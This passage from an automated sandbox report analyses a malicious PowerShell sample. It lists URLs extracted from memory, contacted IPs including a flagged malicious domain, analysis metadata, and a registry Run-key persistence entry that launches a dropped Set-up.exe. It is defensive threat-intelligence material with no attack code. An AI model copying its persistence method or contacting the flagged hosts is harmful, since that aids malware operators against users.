                                http://www.reneelab.it/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://xml.org/sax/features/namespace-prefixesSet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                  		high
                                  http://contoso.com/rdweb/Feed/webfeed.aspx.powershell.exe, 00000000.00000002.1934473378.0000018E53568000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.reneelab.biz/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://downloads.reneelab.com/download_api.phpSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://bug.reneelab.comSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.reneelab.cc/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://qt.digia.com/Set-up.exe, 00000008.00000002.2161780433.000000006C32E000.00000002.00000001.01000000.0000000C.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.reneelab.ru/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.reneelab.de/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://subca.ocsp-certum.com05powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://b.chenall.net/menu.lstSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://isecure-a.reneelab.com/webapi.php?code=Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://subca.ocsp-certum.com02powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0DSet-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://grub4dos.chenall.net/e/%u)Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://subca.ocsp-certum.com01powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.certum.pl/ctnca2.crl0lpowershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://repository.certum.pl/ctnca2.cer09powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?acSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.reneelab.es/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipboSet-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.reneelab.comSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1934473378.0000018E524D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstoreSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.certum.pl/CPS0powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://bugreports.qt-project.org/Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.reneelab.com.cn/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.reneelab.pl/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespaSet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.phreedom.org/md5)Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                    		high
                                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://repository.certum.pl/ctnca.cer09powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.reneelab.comwww.reneelab.comhttp://https://0Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003UserSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.certum.pl/ctnca.crl0kpowershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.reneelab.kr/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.reneelab.jp/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://xml.org/sax/features/namespacesSet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                  		high
                                                                  http://isecure.reneelab.com.cn/webapi.php?code=Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.winimage.com/zLibDll1.2.6Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.vmware.com/0/Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://downloads.reneelab.com/passnow/passnow_Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.reneelab.net/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.certum.pl/CPS0powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://qt.digia.com/product/licensingSet-up.exe, 00000008.00000002.2161780433.000000006C32E000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://c0rl.m%LSet-up.exe, 00000005.00000002.2015583139.00000000035E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://trolltech.com/xml/features/report-start-end-entityUnknownSet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/nSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.symauth.com/cps0(Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.reneelab.it/reimpostare-passwordi-di-windows-login.htmlSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.symauth.com/rpa00Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.info-zip.org/Set-up.exe, 00000005.00000002.2015698096.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000004FFA000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://trolltech.com/xml/features/report-start-end-entitySet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                    		high
                                                                                    http://www.winimage.com/zLibDllSet-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                      		high
                                                                                      http://www.reneelab.com/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://isecure.reneelab.com/webapi.php?code=Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.1934473378.0000018E524D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://trolltech.com/xml/features/report-whitespace-only-CharDataSet-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                          		high
                                                                                          https://downloads.reneelab.com.cn/passnow/passnow_Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anonySet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurchaSet-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          104.21.2.224
                                                                                          		marchhappen.cyouUnited States
                                                                                          		13335CLOUDFLARENETUStrue
                                                                                          172.67.75.40
                                                                                          		rentry.coUnited States
                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1562214
                                                                                          Start date and time:2024-11-25 10:52:50 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 58s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:17
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:IaslcsMo.ps1
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winPS1@19/224@2/2
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 4
                                                                                          • Number of non-executed functions: 460
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .ps1

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: IaslcsMo.ps1

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          04:53:51API Interceptor45x Sleep call for process: powershell.exe modified
                                                                                          04:54:26API Interceptor9x Sleep call for process: msiexec.exe modified
                                                                                          09:54:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          09:54:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          172.67.75.40zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                                                          • arc-gym.com.cutestat.com/wp-login.php

                                                                                          Domains

